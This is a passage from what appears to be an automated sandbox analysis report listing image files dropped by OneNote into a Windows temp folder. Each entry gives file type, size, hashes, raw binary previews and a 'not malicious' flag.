                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{D0208C61-E9B8-496F-AA76-D8A3B63F227D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{D15CE827-1A86-4813-8198-413EEFC757E4}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{D702F4B6-2529-4186-8443-32D8BA41A952}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14177
                                                                                                                                                                                                                  Entropy (8bit):5.705782002886174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                                  MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                                  SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                                  SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                                  SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{D7EB3C51-DDA5-4BC6-8A6A-C24A99E8125A}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DAC99414-C6A5-4E62-8A07-2C1128718B70}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DB6CBE07-BA21-417B-8C7E-AFCEA0BA67F3}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DBB6601F-6AA0-46D6-BA7F-5C0FBAC002CE}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DBDE4ECF-ECC9-4863-B58E-4E6CC98CAD7B}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DC539AAE-F1E1-426E-92DE-E94EE217A048}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DCDF6F59-52FC-41A8-9B03-9AA9D75850CE}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DD369DC0-64A0-440A-8E8E-F09D784FEE7A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{DD8D4739-C01E-4F44-B146-F1D22A0DC010}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10056
                                                                                                                                                                                                                  Entropy (8bit):7.956064700093514
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                                                                                                  MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                                                                                                  SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                                                                                                  SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
